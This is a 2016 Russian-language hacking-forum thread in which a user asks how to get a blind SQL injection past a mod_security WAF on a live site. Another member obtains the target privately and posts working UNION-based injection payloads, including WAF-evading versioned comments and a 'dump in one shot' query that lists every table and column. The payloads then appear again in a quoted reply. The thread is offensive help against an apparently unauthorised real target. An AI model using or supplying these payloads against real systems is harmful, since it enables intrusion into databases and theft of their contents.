Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Sqlmap + waf (https://forum.antichat.xyz/showthread.php?t=440652)

OSW 04.05.2016 13:00

Есть boolean-based blind, есть waf (mod_security), вытащил дб/юзера/хост ч-з sqlmap с набором стандартных тамперов. Но при попытках вытащить таблицы и проч., натыкаюсь на waf'ную 406 ошибку.

Вижу вектор движения: information -> inform%0bation (так отрабатывает), но уперся в автоматизацию этого действия. Есть какие-то решения?

SooLFaa 04.05.2016 13:50

DIOS - DUMP IN ONE SHOT. Технология SQL Injection с помощью которой можно вывести все таблицы столбцы а далее в тот же скуль мап ты уже можешь указать имя конкретной таблицы. Это как один из вариантов.

faza02 04.05.2016 14:31

Цитата:

Сообщение от SooLFaa
SooLFaa said:

DIOS - DUMP IN ONE SHOT. Технология SQL Injection с помощью которой можно вывести все таблицы столбцы а далее в тот же скуль мап ты уже можешь указать имя конкретной таблицы. Это как один из вариантов.

особенно актуально с blind

SooLFaa 04.05.2016 14:36

Цитата:

Сообщение от yarbabin
yarbabin said:

особенно актуально с blind

OUT OF BAND - как вариант.

BabaDook 04.05.2016 14:37

Цитата:

Сообщение от yarbabin
yarbabin said:

особенно актуально с blind

Как подъёб звучал

SooLFaa 04.05.2016 14:39

Цитата:

Сообщение от BabaDook
BabaDook said:

Как подъёб звучал

Подъёб засчитан.

faza02 04.05.2016 14:47

oob есть не для всех бд, тут скорее речь о mysql

SooLFaa 04.05.2016 14:56

Цитата:

Сообщение от yarbabin
yarbabin said:

oob есть не для всех бд, тут скорее речь о mysql

Полностью согласен. Но вдруг....

OSW 04.05.2016 18:22

Цитата:

Сообщение от SooLFaa
SooLFaa said:

OUT OF BAND - как вариант.

Благодарю, но не сработало.

SooLFaa 04.05.2016 19:41

Цитата:

Сообщение от OSW
OSW said:

Благодарю, но не сработало.

Я так понимаю, что СУБД MySQL?

OSW 05.05.2016 11:32

Цитата:

Сообщение от SooLFaa
SooLFaa said:

Я так понимаю, что СУБД MySQL?

Да, забыл указать сразу.

SooLFaa 05.05.2016 11:43

Цитата:

Сообщение от OSW
OSW said:

Да, забыл указать сразу.

Скинь в лс таргет, после работы попробуем покрутить.

SooLFaa 05.05.2016 13:55

Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.

Валидный запрос в твоем случае выглядет так:

../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/

DIOS.

..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/

И всё проще без sqlmap. Валидную ссылку отправил в лс.

OSW 05.05.2016 15:19

Цитата:

Сообщение от SooLFaa
SooLFaa said:

Во - первых, неправильно определил вектор. Здесь самый обычный UNION (ну есессно если есть юнион бэйсед есть и блайнд, никто не спорит). Тоже касается и payload для waf bypass.
Валидный запрос в твоем случае выглядет так:
../news/0'+/*!12345UnIon*/+select+1,2,(Select+Table_Name+From+/*!information_schema*/.Tables+limit+1,1),4,5,6,7,8,9,0+--+'(/
DIOS.
..news/0'+/*!12345UnIon*/+select+1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=ex port_set(5,export_set(5,@,table_name,0x3c6c693e,2) ,column_name,0xa3a,2)),@,2)) ,4,5,6,7,8,9,0+--+'(/
И всё проще без sqlmap. Валидную ссылку отправил в лс.

Мегареспектище!

Курю, где был не прав.


Время: 15:59